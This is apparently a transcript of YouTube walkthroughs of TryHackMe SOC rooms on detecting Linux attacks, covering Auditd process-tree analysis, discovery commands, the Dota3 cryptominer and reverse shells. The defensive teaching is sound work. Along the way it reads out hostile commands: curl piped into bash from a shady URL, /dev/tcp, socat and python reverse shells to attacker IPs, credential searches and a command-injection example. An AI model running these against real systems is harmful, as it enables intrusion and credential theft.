3905. The result didn't help. Moving on to number 3, 1, you start here from a mysterious who am I. You see that its parent process has a PID of 3908. Okay, so we just did this in reverse order, but we get the gist of it. Who am I? Okay, they started from here. The PID ID of 39005. Pivot off that information here. Okay, of that 3905. Didn't get any useful information there, so they moved on to number 3 here with this PID of 3898, and then it says looks like started from Python web app. All right, let's see here. Auditd and process tree. Continuing the example, you begin by locating the suspicious command in the logs with the au search -i-x who am I. Next, you walk up the process tree using the --PID option until you reach PID1, the operating system process. The tree eventually shows that who am I was launched by a Python web application opt my web app.py. This immediately raises the question, was the application breached and used as an entry point? Tracing who am I origin. So this first one here, au search -i-x who am I. It says -x filters the results by the command name. You can see proc title, who am I. You can see some other stuff here, syscall stuff right there. So just scroll over a little bit here. All right, the next one says they're looking for the PID of 3905. This is a parent process ID of who am I. The next one, 3898, is a grandparent process ID of who am I. Okay. And so, so some good information here to review and look at here. And we can see that here, the first result, you can see that the PP ID right there, and they pivot off that information to the next one, right? And then you can see it again here, the PP ID 3898, and they plugged it in there. All right, good to go there. And you can see that it backtracked it to this here. Awesome. Okay. Next, you might wonder if who am I is simply part of the application's normal behavior. Maybe so, but that question would require weblog analysis, external research, or communication with the developers. What you can do instead is use the process tree to look for other, more dangerous commands launched by the app. By listing all child processes of opt my web app.py, you may find clear evidence of the app's breach, like a malicious curl command. Listing all child processes, so au search -i-ppid 3898, pipe that into grep, proc title, grep for a simpler output, and here's the results from that. So you can see the commands who am I, ls-la, you can see curl going to some weird C2 server, looks like, and he piped into sh command. Now let's look at the TryHackMe breach from the previous task through the Auditd angle. Use au search and the examples from the task to uncover the full picture. Okay, so once again, go ahead and pause the video, try it yourself, then come back to the video, and then we will proceed forward. Let's take a look. What is the PPID of the suspicious who am I command? All right, so to do that, you're going to use AU search -I-X, hit enter, and you're going to look for the PPID right here, which is 1018. And once you have that, you're going to pivot off that information as well. So I'm just going to up arrow here to get that ready to go. So plug in that as answer. Moving up the tree, what is the PID of the TryHackMe app? So pivot off that information there, and you can see that this is the TryHackMe app that they're looking for, right, in question. And then from there, you can see that the PPID is going to be 577 for that one. Last one, which program did the attacker use to open a reverse shell? Well, I mean, you can kind of infer that they're going to be using Python to do this, but if you want to dig a little bit deeper here, I'm just going to up arrow. You can pivot off this proc title here using that same PID right there, okay? And you can see that user bin Python 3 comes up here, so Python appears to be what we are looking for there. All right, so we're done with that. Task number 6 here, and also you can use these hints, okay, if you get stuck. So let's take a look here. This one says AU search, so we did that, and then same thing here, and then from here, they did a different one here. They did the -- PID for that one, listing all the commands. Interesting there. So I wonder if, oh, okay, they just did that way. Let's see what they get here. If anything different comes up here, we'll do PPID of that. There we go. Okay, that lists everything out here if you want to go that route, but you should get the same answer. Also, there's multiple ways of getting it, right? And then through here, you can see that Python 3 is mentioned there to get that, looks like a reverse shell, okay? Awesome. So multiple ways to get that one. And let's go to task number 6 here, the advanced initial access, human-led attacks. In the previous task, you explored initial access via SSH and exposed services. But what about phishing and USB attacks? So commonly seen in Windows environments. Since Linux primarily is a server OS operated by technical people, it is harder to trick system owners into running phishing malware or inserting a malicious USB. Still, the risk remains. For example, let's take a look at this table here. So we have scenario, example, and consequences. An IT member looks for a solution to a server issue and desperately tries this script found in a forum, curl, https shadyforum.thm/fix.sh piped into bash to run it. And consequences, the IT member didn't check the script content and it appeared to be malware silently infecting the server. That's right. You should always double check that information there, that file. Make sure there's nothing funky going on there. A developer wants to install a Python fast API package on the server, but mistypes a single letter. Might be some kind of typo squatting issue here. So pip3 install fast PI. This mistyped package was malware deliberately prepared and published by threat actors, which is commonly used these days. That's a common attack method for threat actors to take advantage and get into your environment. You accidentally mistype something, fat finger something, that could be detrimental. Supply chain compromise. While not unique to Linux, you should also be aware of supply chain compromise. These attacks breach a software first and then affect all its users with a malicious update. Since a typical Linux server uses hundreds of software dependencies maintained by different developers, the attack can come from anywhere, anytime. Let's see some examples. A backdoor in the xutils library that is part of SSH nearly led to a breach of millions of Linux servers. A breach of the TG actions resulted in a leak of thousands of secrets like SSH keys and access tokens. Yes, I remember this very well. That was a big issue last year. And also, just do a search on NPM supply chain compromise, and you will see a lot of recently released news articles about that particular attack vector. That's been making a lot of noise in the cybersecurity community. So N as in November, P as a Papa, and then M as in Mike. So look that up. Detecting the attacks. All initial access techniques described in this room can be uncovered through a process tree analysis. You start with a trigger such as a SIM alert on a suspicious command or connection to a known malicious IP. From there, you build a process tree to trace which application or user initiated the event, a web server, an internal application, or an IT administrator's SSH session. Finally, you determine whether the attack activity is legitimate or an indicator of malicious behavior. So let's take a look here. Why would the web app run Who Am I? Can it be a web application breach? So it says systemd, OS process, PID1, Apache 2, Apache web server, PHP-FPM, PHP web application, sh-c, Who Am I, the spawn shell, Who Am I command. Why would TryHackMe app run these commands? Can it be a supply chain compromise? So once again, systemd, thm service, wget, base64 tar. Why would Tom log in via SSH and download a crypto miner? Can it be a SSH breach? So once again, systemd, SSHD user Tom, curl and xm rig, which is the crypto miner. All right, so here we go again. Go ahead and pause the video and try to answer these questions yourself, and then come back to the video and we will continue on. Which initial access technique is likely used if a trusted app suddenly runs malicious commands? Well, that's going to be supply chain compromise, as mentioned up here. Supply chain compromise. So they're infecting the dependencies, perhaps, in which several software applications can be using at the time, right? So if they infect those particular dependencies, it can affect that software in return, creating a supply chain compromise, as read there. Which detection method can you use to detect a variety of initial access techniques? That's going to be process tree analysis, right? As we had learned about here, as we're reading through here, it says right here, through a process tree analysis, right there. Okay, so we're going to wrap this up with task number 7, conclusion. Great job exploring the initial access techniques and an especially complex topic. The process tree analysis, while it may seem hard to apply, you will happily use it on a daily basis with some practice and a more convenient SIM interface. Using system log sources and Auditd, you learn to identify how attacks start and are now ready to learn how they continue. And also, a lot of ERs these days will build out this process tree for you if they detect something, so that is very useful. Key takeaways. Attacks on SSH are widespread, but they are easy to detect via authentication logs. Exposed services are always a risk since they can lead to a whole Linux compromise. Check out the Bulletproof Penguin room to learn how to harden and secure Linux servers. While phishing is not common on Linux, human-led and supply chain attacks are still possible. Process tree analysis is your best approach in identifying the initial access techniques. Let's continue. So we are done with this room. Awesome. Hopefully you made it to the end. And if you are finding these videos of value, my channel of value, you want to help support the channel for free, go ahead and like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Happy hacking, happy defending, and stay safe in the cyber trenches. Have a good day. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos. You can see here over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking, enjoy the video. Hey everybody, welcome back to my channel. This is WireDogSec, back with another video for you guys. Today's video, we are in TryHackMe SOC Level 1 Learning Path, Linux Security Monitoring Module. This is the Linux Threat Detection 2 room. Explore the first actions of attackers after breaching a Linux server and learn how to detect them. Let's see what they're cooking with today. Task number 1, introduction. What happens next after threat actors enter the Linux system? What commands do they run? And what goals do they aim to achieve? In this room, you'll find out by exploring common attack techniques, detecting them in logs, and analyzing a real-world crypto miner infection from start to finish. Learning objectives. Explore how to identify discovery commands in logs, learn common threats endangering Linux servers, know how attackers upload malware onto their systems, practice your skills by uncovering a real crypto miner attack. Sounds exciting. Prerequisites: complete the Linux Threat Detection 1 room, remind yourself of MITRE tactics and techniques, know basic commands like wget or grep, or you can check out my channel for any videos that cover these particular areas. Lab access: here's information on how to access the lab here. It says to switch to root on the VM, please run sudo su. So we may be utilizing that command there. Okay, I'm just going to start the machine here to get it ready to go. Here's credentials here. Alternatively, you can access the VM from your own VPN connected machine via these credentials, whichever ones you get here. Okay, I'm ready to learn. And if you want to help support the channel, it's totally free. Be sure to like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Without further delay, let's go ahead and dive into it. Task 2, Discovery Overview. Discovery. Imagine suddenly appearing in a Linux system and all you see is a command line interface. Your first question would be about where you are and how you appeared there, right? Interestingly, this is how most Linux breaches start for attackers. This is because botnets usually automate the initial access and human attackers join only when an entry point is ready. Right, similar to what we saw in the Windows topics. Whenever they get that initial foothold onto that machine, that environment, they need to get a layout of the environment. See who they are, see what access they have, maybe see what username they are, right? So let's see what they're talking about here. Botnet automates the first few stages of attack. Okay, botnet gives control over to the victim to a human. Okay, the human botnet owner continues the attack chain. Awesome. First actions. The first discovery commands directors run on Linux systems are usually the same, no matter which entry point they used and the goal they pursue. The only exception when discovery is skipped is when the attackers already know their target or simply want to install a crypto miner and exit. No matter who the victim is, let's see some basic discovery examples. Okay, so we have a table here. We have discovery, goal, and typical commands. OS, operating system, and file system discovery. So we have pwd, which is print working directory, ls, env, uname-a, lsb underscore release-a, hostname, user and groups discovery, id, who am I, w, last, cat, etc, sudoers, cat, etc, passwd, process and network discovery, ps, aux, top, ipa, ipr, arp-ass-tnlp, netstat-tnlp, cloud or sandbox discovery, system d-detect-avert, lsmod, uptime, pgrep, and then inside there, edr or sandbox. Awesome. I assume that's similar to the grep command. As you can see, attackers rely on the same commands you would use. In the next task, you will learn how to tell bad from good, but one specific command should never or should have your attention, which is who am I, right? Because if you're a legitimate user, you probably know who you are as you're logging into the machine, right? While legitimate applications rarely need this command, adversaries almost always run it first after breaching a service. In fact, your SOC team can even consider creating a detection rule for any who am I execution. There's a high chance you'll catch the attackers. Open the VM and test some discovery commands yourself. Follow the instructions below to answer the questions. All right, so you already know what to do. Go ahead and pause the video. Try to answer the questions yourself. Come back to the video, and then we will proceed forward. Let's take a look at these questions. Run system d-detect-vert to detect the system's cloud. What is the command's output you discovered? Okay, so if we do that, I'm just going to up arrow here, and we have Amazon. So we're looking for here. Now run ps-aux and look for EDR or antivirus processes. What is the full path of the, or to detect the anti-malware binary? So they want the full path of the anti-malware binary. All right, so if you were just to do that by itself, you'll pull up everything, right? So we'll just do it like this. All kinds of processes, and there's a lot to sift through here. The hint does give you some information to what to look for, so you can grep keywords like security scan, EDR, malware, stuff like that, and see if anything interesting comes back here. So I'm going to clear the screen, and I'm just going to up arrow here to that, so you can pipe that into grep, and you can just type in like scan, right? And you can see the full path right here. Var, lib, ultrasec, malscan. Now ideally you want to put something in there like, you know, maybe a well-known EDR tool like CrowdStrike or, you know, Palo Alto's tool or SentinelOne, something like that. Maybe you'll come back with some interesting information there. Task number 3, detecting discovery, specialized discovery. After initial discovery, threat actors might also utilize more focused commands to achieve their goals. Data stealers look for passwords and secrets to collect. Cryptocurrency miners query CPU and GPU information to optimize the mining. And botnet scripts scan the network for new victims. Some malware can also combine all three objectives. For example, so we have another table here: attack objectives and typical commands. Find and steal credentials and other sensitive data, so that history, pipe that into grep, then pass to look for password information like that. Find and then dash name env, find and then home directory dash name id underscore rsa. Identify how suitable the victim or the system is for crypto mining, so the cat proc, CPU info, ls CPU, pipe down to grep, model, free dash m, top, h top. Scan the internal network for other future victims, so ping for IP in this range here, do in C-W1 IP22 done. They're pinging, they're doing like a ping sweep here, it looks like. Detecting discovery. Detecting discovery commands is straightforward with Auditd or other runtime monitoring tools. First, configure Auditd to log the right commands like those shown in this room, and then hunt for discovery using a SIM or AU search. But the real challenge is deciding if the commands came from an attacker, a legitimate service, or an IT administrator. So let's take a look at this picture here. Detect discovery. Number one, log common discovery commands. Examples, Auditd, or with Auditd here. You can see that here they have information listed in there, what they're looking for. Right, who am I, ID, PWD, uname, netstat. Number two, hunt for discovery and SIM or manually with AU search. And that's what they're doing here. They're using AU search this time around, and they're grepping information here to look for, right? So they're trying to find out those commands. And then number three, use process tree to identify what caused the discovery. Okay, so let's go ahead and continue on here. It is very important to get to the context of discovery commands. For example, it's a red flag when a web server suddenly spawns who am I, or when your IT member starts looking for secrets with find and grep. On the other hand, a network monitoring tool is expected to periodically ping the local network. You can get that context by building a process tree, for example. So tracing who am I origin, they did AU search -i-x, who am I, look for a discovery command like who am I, and that's what they did here. Next one says they're looking for the PID, right there, 3898. So they're taking that parent process ID right there, plugging it in here, identifies parent process, a lp.sh script, and we can see that here in that temp folder. So it's kind of suspicious there, right? In the temp directory as well. And then from there, they did another one here with the PPID 3898. Look for other processes created by lp.sh. Five more commands like find, home, dash, name, secret, confirming the script is malicious. Okay. Interesting there. I wish it would have shown that or something. I guess that's the example of what to look for. For this task, imagine you received a SIM alert about a spike in discovery commands. The first thing you see is that the IT support user launched the hostname command. Can you continue the investigation on the VM and find out what really happened? Sweet. All right, so once again, we have some questions here. Go ahead and pause the video, try to answer them yourself, come back to the video, and then we will proceed forward. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos that you can see here, over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking. Enjoy the video. Let's go ahead and take a look at these questions. What is the path of the script that initiate the hostname command? So we're going to follow along with this here, except we're going to replace who am I with hostname and then fill in the PIDs and PPIDs of what we find. All right, so let's go ahead and try that now. You can see -x hostname, pull that back, and you can see the PPID is 3771. All right, so just going to go in here and just copy and paste. So make sure it's --PID, all right, because I got stuck right there for a minute until I figured out I was putting in the wrong one. So 3771. Okay, pulls back this information here. You can see home IT support right here. Current working directory, it looks like, and then right here you can see debugs listed here, debug.sh listed there, so that appears to be what we are looking for. Okay, so go ahead and plug that in as our answer, and they want the full path here. All right, so we already know it's going to be home, IT support, and then debug.sh there, as we can see there from home IT support. All right, next one, what is the last discovery command launched by the script? All right, so for this one, we're going to use this search here for it, this PPID, okay? Actually, I'm just going to up arrow and just put in the extra P, and then pull back that information. Scrolling through here, you can see the last one's going to be this here, this PS, then dash EO, PID, PPID, etc., etc. So we're going to grab this here, okay, plug it in as our answer, and we're good to go. Looking at the script content, what's the email of the script author? So now we have to go ahead and cat this, but you don't have permission to do so as this account. Okay, so you're gonna have to do a sudo su to get in there. Okay, and then just going to cat it like such, and then you're gonna grab the email there. And to get out of this, just type in exit to go back. Okay, and then clear all this out, and there we're done. So there's the email. Let's continue on to task number 4: motivation for attacks. Hack and forget attacks. The discovery stage, the actors usually reveal their motivation by installing specialized malware or taking actions unique to some class of attack. Before jumping into the technical review, let's consider the common goals of attackers when breaching Linux. They can be organized into two informal categories: hack and forget, and targeted attacks. In this room, let's focus on the hack and forget ones. All right. Hack and forget attacks. These attacks run at scale and focus on quick gains. For example, a threat group may continuously scan the internet for exposed SSH with TryHackMe password and get a few victims every month. Then after a quick discovery, the attack usually ends up in one of the 3 scenarios below, or 3 scenarios at once. Install crypto miner, earn money by using the victim's CPU/GPU to mine cryptocurrency. Enroll to botnet, add the victim to a botnet, example Mirai, and use it for tasks like DDoS. Use as proxy, use the victim to send phishing, host malware, or route the attacker's traffic. Ingress tool transfer. So how do threat actors continue the attack and download malware like CryptoMiner to their Linux victim? In minor terms, how do they perform ingress tool transfer? There are many ways, but in the vast majority of cases, they utilize one of the 3 pre-installed commands. So let's take a look at this table. Command and usage example: wget, download a file from the website. So wget didn't have the URL to that particular file here. .gz looks like -o, and then there it is here in the temp directory. Curl, make a request to the web page. So curl -- output, and they're getting it that way. Then SSH, transfer a file via SCP or SFTP, and you can see that here, SCP, and then they're getting it that way. Okay, so like other process creation events, the commands above can be logged with Auditd and sometimes appear in bash history. However, there is a case where process logs aren't helpful. If the victim is reachable over SSH, an attacker can run SCP or SFTP from their own system. In this case, you won't see the command on the victim's Auditd logs, but you will see a new SSH login. The same principle applies to other file transfer services such as FTP or SMB. Let's see an example. So option 1, attacker connects to victim, SCP, and you see that here, malware.sh, looks like the temp directory right there, connecting to THM-VM, SSH, logged in as Ubuntu, file transfer from attack VM to THM-VM, job is done, logging out from THM-VM. To detect on victim, look for SSH login and var log auth.log. Option 2, victim connects to attacker, SCP, attacker at attacker or -VM. The malware.sh to temp, and it says it's connecting that way. Okay, so detect on victim, look for SCP command and Auditd logs. So different ways they can do this here. Additional detection in this task, you will mostly relied on Auditd process creation events to detect the malicious commands on an authentication log. To detect suspicious SSH logins, they are both excellent sources for uncovering the most common attacks. However, for ingress tool transfer, your SOC can rely on network traffic, a download from an IP previously seen in cyber attacks. Virus total example: a download from a suspicious or known malicious domain such as randomly generated .thm, a download from a public service known to host attack tools such as GitHub. File events: a newly created file in the temporary directories like -temp or tmp or -var tmp. A newly created file like exploit shell.php, or looks like a random file name. Antivirus alerts: EDR or antivirus alert triggering on a new malicious file or process. For this task, look for commands on the VM that may indicate ingress tool transfer. You can start with au search-i-x command to answer the questions. All right, so once again, go ahead and pause the video, try to answer the question yourself, then come back to the video, and then we will proceed. Let's take a look at these questions. From which domain was the Elastic agent downloaded? So once again, we can reference that table up above here. So we have commands to look for using the au search. So we have wget, curl, and ssh. All right, so that's what we're going to pivot off of. The first one's going to be wget. Okay, au search-i-x wget, and you can see information here. You can see the URL, and you can see the domain right there is what we need to grab here. Okay, and this appears to be legitimate. Okay, so let's continue on to the next one. What is the full path to the downloaded helper.sh script? So for this one, you have to pivot off of the curl command. Okay, and see what's going on there. And you can see that it's going to this weird looking website here, or this domain here, to pull down this helper.sh script, and it's putting it in this location right here, var tmp helper.sh. So we need to grab that piece, plug it in there. Which of the downloaded files is more likely to be malicious? The one downloaded with curl or wget? Well, curl is the one that looks suspicious to me, so that's the one I plugged in. And if you want to look at the other one too, you can do the ssh, I believe is what it was for the last one. Let's double check here. Yeah. So if you want to check for that, just plug in SSH, and then you can see information come back for that. Okay. So let's go ahead and continue on here. Task number 5, Dota 3 first actions. Dota 3 malware analysis. In the following task, you will see how the learned tactics look in the real world. As a reference, let's follow Countercraft and Sand's report about Dota 3, a simple but well-known malware that infected and still infects many systems worldwide. Please note that some malware actions in this task were simplified to improve readability. Now let's see how the infection starts. Initial access. The botnet of more than 2,000 distinct IPs across 94 countries scans the internet for systems with OpenSSH. The botnet brute forces these systems, mainly targeting the root user and trying the top 1,000 weak passwords. If the password was guessed, one of the botnet host accesses the victim via SSH and continues the attack discovery. Next, from the SSH session, the threat actor automates the discovery by running multiple commands in quick succession. Even from the first 3 lines below, you may conclude it is a cryptominer infection, as there is a low chance that other malware ever need to know the victim's CPU or RAM information. That here, the proc, CPU info, and some other things, right? Unclear purpose, generic discovery, persistence. Although we haven't covered persistence in this room, the next actions are simple to understand. The first command changes the password of the breached Ubuntu user to a more complex one to secure the victim from being breached by competitor botnets. And the following commands replace all SSH keys with the malicious one to lock out the system owner from accessing their server. This is all to ensure reliable access to the victim when needed, and we can see that here. Note the MDR, okay, unique to this attack. Detecting the attack. I'm sure that's a bad word there, so I'm not going to say it. Nothing complicated so far, right? Still, Dota 3 remains active because many administrators set weak SSH passwords. In a real SOC with SIM, you would likely receive multiple alerts, SSH login from a known malicious IP, a spike of directory commands, and a match for the attack string, which is that. You can also spot the attack manually using the 2 methods below. So take a look at this table: log source and description, auth logs, cat var log, auth.log, pipe that into grep, and looking for accepted. Look for successful SSH logins by password, forum, untrusted external IP addresses, Auditd log or process logs, au search-i-x, then command. Look for execution of the discovery commands, examples, uname, ls cpu, and trace their origin. For this task, try detecting a similar cryptominer infection chain in the VM. Open the home Ubuntu scenario folder and use the logs aside to answer the questions. Please note that Auditd logs can be viewed as au search-i if home Ubuntu scenario audit.log. All right, so once again, go ahead and pause the video, try to answer the question yourself, come back to the video, and then we will proceed. Let's take a look at these questions. Also, you can feel free to use these hints here. I got stuck on this second one, so I had to use ChatGPT to help out with that. But anyway, which IP address managed to brute force the exposed SSH? So for this one, you can just go ahead and cat the auth.log, pipe that into grep, and you go for like accepted as they mentioned before. You can see this IP comes into play here multiple times, so that's the one I went with. All right, next one, which command did the attacker use to list the last logged in users? So for that one, like I said, I used ChatGPT, just said Linux command for last logged in users, and it gave me an option here for last, so that's why I did a grep on. So I'm just going to up arrow here. Okay, you can see information related to that. And you can take a look at this type equals exe CV as well. But yeah, last is the one I went with here for that one. And then the other one is which 3 EDR processes did the attacker look for with egrep? And you're going to put it in alphabetical order. And for this one, it wants you to go back and use Auditd to build a process tree. So you can go that route if you choose to do so. But I use the tools at my disposal. Okay. Anyway, so we're going to look at egrep activity here. So I'm up arrow here. So I'm doing the AU search on it on audit.log, pipe that into grep, then egrep, and it pulls back all kinds of stuff here. But as you're sifting through here, you'll come to see that things of interest are going to be this here, this Falcon, Sentinel, and DS_agent. So that's what I went with. Looks like they're looking for CrowdStrike Falcon, I guess Microsoft Sentinel, and not sure what DS agent is for that, but that's what I went with here, and just plug it in alphabetical order, and you're good to go there. Task number 6 is Dota 3 minor setup. Continuing the Dota 3 infection chain, the threat actors have maintained their persistence or presence on the victim, and now decide whether to install a crypto miner and supplementary malware. Since they already have SSH access, they simply upload the tools via SCP using a previously changed password. Below is an example of how it works, so how threat actors transfer malware. You can see they're using SCP to get this dota3.tar.gz onto the victim machine in the temp directory or TMP directory there, and it says it transferred right there. After transferring the tools, the attackers unpack them into a hidden folder under TMP, a common location for staging temporary malware. Take a look at the commands below and notice how strangely the created directories are named. This is to resemble legitimate software and discourage the IT team from investigating further upon detection. So prepare a hidden TMP.x26-Unix folder for malware. So there's cd into TMP rm-rf.x2. You can see make directory cd unarchive malware to TMP, etc. And you can see the rest there. Sleep for 3 seconds looks like here. So all kinds of interesting activity going on there. Lastly, the threat actors execute 2 binaries from the archive. The first, TSM, is a customized network scanner that probes the internal network for other systems with exposed SSH services. The second, initall, is an XM rig crypto miner that loads the victim's CPU to generate revenue for the attackers. Pay attention that both binaries are launched with no HUP. A command that allows the processes to continue running in the background even after SSH session is closed. You see that here, scan the internal network with the TSL malware. So you can see that here, that's firing off. Look for more information there. Sleep for 8 minutes looks like here. And you can see the no HUP as well, that was referenced there. Okay, sleep for 20 minutes looks like. Run the actual crypto miner name initall. And then that's it. Dota 3 attack is now complete. Detecting the attack. Throughout the room, you learned how to use logs to hunt for different malicious processes, and the detection of Dota 3 infection is no different. Here, the common indicators your SOC rules or EDR alerts would react upon are Auditd logs, creation of untrusted hidden files and folders in the TMP directory. Auditd logs, creation of files named like known malware such as dota3.tar.dz. Auditd logs, usage of commands often observed in attacks such as no HUP. Network traffic SSH port scan of the whole 192.168.star and 172.16.star networks. EDR solution. The XMRig crypto miner binary is blocked by most EDRs. Virus total example if you want to check that out. Continue the analysis of the crypto miner from the previous task and uncover its last steps. Use the same logs from the home Ubuntu scenario folder to answer the questions. So once again, pause the video, try to answer the questions yourself, then come back to the video, and then we will proceed forward. Something else you can try to do for this one here, which command did the attacker use to list the last logged in users? You can do something like this: you search -i-if audit.log, pipe into grep, and look for proc title information. It's going to be a lot that comes back here. But as you sift through this information, that binary for last will appear in here. And also some other commands that they ran inside of here. So I'm trying to see if I can find it real quick. Let's see. It's around here somewhere. It's this, as you can see, there's a lot of information to sift through, but there it is. So you can try to figure out through this method as well by reviewing all this information inside of here and see if anything like sort of sticks out. So just some other tips and tricks that you could possibly use. But as usual, they want you to use the process tree to try to reverse the steps and things like that. Let's take a look at the questions. What is the name of the malicious archive that was transferred via SCP? Now you can use these hints here to help steer you in the right direction. All right. I guess you can look for SSH, things of that nature, but it did mention archive, so I went off of that. GZ. So I did a search on audit.log, piped into grep, then look for anything referencing GZ, and you can see there's various different items here, and this appears to be the one of interest that we need. So I grabbed that particular file name here, plugged it in as our answer. Next one, what was the full command line of the crypto miner launch? And then earlier in this task, it had mentioned the no HUP, so that's what I pivoted off of. All right, so let's go ahead and clear this out, and I'm gonna up arrow here, grep no HUP, and it pulls back all kinds of information for that. Okay, you can see that it's firing off that scan as well that we're going to reference in the next question. But anyway, so this appears to be what we're looking for here. So proc title, no HUP, and then TMP, and then you can see the rest there. So just grab that or just manually type it in, plug it in as our answer there. Which IP address range did the attacker scan for an exposed SSH? Okay, and as I said before, this appears to be the IP range here. So this 10.10.12.1, and that's going to the .10 there. So plug that in as the range, and we're done. Task number 7, conclusion. In this room, you learned a lot about hack and forget attacks on Linux, from the first discovery commands to the final impact. You also explored how to detect the attack stages using Auditd and authentication logs, and even practice your skills by uncovering a crypto miner attack. Key takeaways: hack and forget attacks are usually automated and performed at scale by botnets. In Linux, all attack stages mostly rely on pre-built commands like ls, cat, wget, and ssh. Your best approach is detecting malicious commands is Auditd and process tree analysis. Let's move on. So we are done there. Awesome. Hopefully y'all made it all the way to the end of the video. And if you did, thank you. I really do appreciate y'all for taking the time to watch my video. And if you want to help support the channel, be sure to like, comment, share, subscribe, hit that notification bell so you know every time I upload to the channel. Happy hacking, happy defending. I'll see you later, and stay safe in the cyber trenches. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos that you can see here, over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking, enjoy the video. Hey everybody, welcome back to my channel. This is WireDogSec, back with another video for you guys. In today's video, we are in TryHackMe. This is the SOC Level 1 Learning Path, Linux Security Monitoring Module, Linux Threat Detection 3-Room. Cover the last stages of attacks on Linux and learn how they look in system logs. Task number 1, introduction. Not all Linux attacks are simple SSH brute force or crypto mining. Some are carefully planned, targeted campaigns comparable to most advanced Windows breaches. In this room, you'll delve into more complex manual Linux attack techniques commonly seen in targeted intrusions and learn how to detect them using system logs. Learning objectives. Learn how reverse shells are used in Linux intrusions. Understand how the attackers escalate their privileges. Explore the 5 most common techniques to persist on Linux. Uncover the learned techniques through the system logs. Prerequisites. Complete the Linux threat detection 2 room. Recall the second half of the MITRE tactics. Be familiar with Bash and Linux administration, or you can check out my channel for any videos related to these particular areas. Lab access. Here's the instructions on how to access the lab machine. As you can see, I already have the target machine fired up here. If you don't, go ahead and click that start machine button. Okay. And I have it open up in another tab, as you can see there. And also, we may have to use sudo su in some of these particular tasks. Also, here's the instructions on how to connect to the machine via the VPN, your own VPN. Okay, so use whatever credentials appear there for you. But before we get into it, if you want to help support the channel, it's totally free. You can like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Without further delay, let's go ahead and dive into it. Task 2, reverse shells. Attack convenience. Threat actors entering via SSH get a convenient terminal with colors, auto-completion, and control plus C support. However, not every breach grants a fully functional terminal. When initial access happens via an exploit or a web vulnerability, the attackers may face limitations, buggy command output, execution delays and timeouts, rate limits, network restrictions, and many more. In this task, you will gain access to the TryHackMe app and see how these limitations work in practice. That's right. You may get that initial shell on the box, right? But it doesn't have the full features as what you would see in like the command line or a terminal, as they just explained there. So let's take a look at this graphic real quick. A vulnerability allows command injection, and you can see that here with this uname -a, right? You can see the information being displayed back. Looks like a web shell of some sort, possibly. Attack limitations need to prepend 127.0.0.1 and end to the commands. Number 2, commands are executed after a delay after ping. 3, can't use control plus C or C command history and errors. But that's why oftentimes they'll try to upgrade their shell to a more stable shell or something else, right? Reverse shells. To combat the limitations, they're actually establish a reverse shell, a session from the victim to the attacker, a more convenient and often the only possible action to continue the attack. You can read about reverse shells in the shells overview room or check out my channel if I've done a video of that. But let's focus on the detection part of the task. Below are 3 of the many methods to open a reverse shell on Linux. So let's take a look at this table here. Side, we got command on the victim and explanation. All right, so it looks at bash-i and greater than and dev tcp 10.10.10.10 1337, and you can see the rest there. The victim is forced to connect to .10 and then on port 1337 and launch bash for the attacker. Next one, they're using SOCAT, okay, and you can see the information here: tcp exec bash and some other information there. SOCAT alternative to the above command. The attacker is listening at this .20 address on port 2525. Next one, Python 3-C, and you can see the IP address there, and you can see the port number, and then you can see they're spawning. Looks like they're using bash again. Python alternative to above command. The attacker is listening at .30 and then on port 80, it looks like. Detecting reverse shells. SOC typically treats reverse shells as critical alerts, as they indicate that the system has already been breached and a human threat actor is actively attempting to establish a shell and continue the attack. Luckily, they are detectable with Auditd. Below is the log output when a SOCAT reverse shell is established after exploiting a vulnerability in the TryHackMe application. It says finding reverse shell origin. They did an AU search -i-x SOCAT. Look for suspicious commands like SOCAT, and you can see the information here. Okay, see proc title equals SOCAT right there, and it has a TCP and it has the IP there, and also the port there. And you can see the PPID and the PID for that. Next one is they're looking at the PPID. Okay, so what we've seen in other rooms before, it says find its parent process and build a process tree. And you can see more information here related to what they're doing. Okay, And then they're pivoting off of the PPID once again. Here it says move up the process tree to confirm its origin. Try ping me, and you can see that right here. It says Python 3, and then you can see that there's opt try ping me, and then main.py right there. After the verse shell to the attacker's IP is established, it is usually followed by discovery and other stages you learn in the previous rooms. As always, you can list all commands originating from the spawn verse shell by building a process tree. And let's have a look at this. It's listing reverse shell activity. AU search -I-X SOCAT start from the detected verse shell. Okay, and then they're pivoting off of that PPID once again. Okay, and then they're piping that into grep proc title, list all of his child processes, right? So ID they did uname -A ls -la. Okay. In this task, you'll use the VM to see how TryPingMe vulnerability works in practice, access TryPingMe through your browser or attack box at whatever IP address you have and information you have there. Access the scenario Auditd logs at AU search -I if home Ubuntu scenario audit.log here. Okay, so let's see if this is working properly first. All right, I'm just going to paste this in there. Okay, awesome. So we know it's working. And we have some questions, so go ahead and pause the video, try to answer the questions yourself, then come back to the video and we will proceed forward. Let's take a look at these questions. Run 127.0.0.1 and who am I in the TryPingMe web app. What output do you see after the ping results? Okay, so let's flip over here to the attack box. I am navigated here, TryPingMe. I have that entered here. I'm gonna hit ping and let's see what it does. Takes a few seconds. Then you can see it's doing its ping information there, and all the way at the bottom you can see it says this information here, SVC try ping 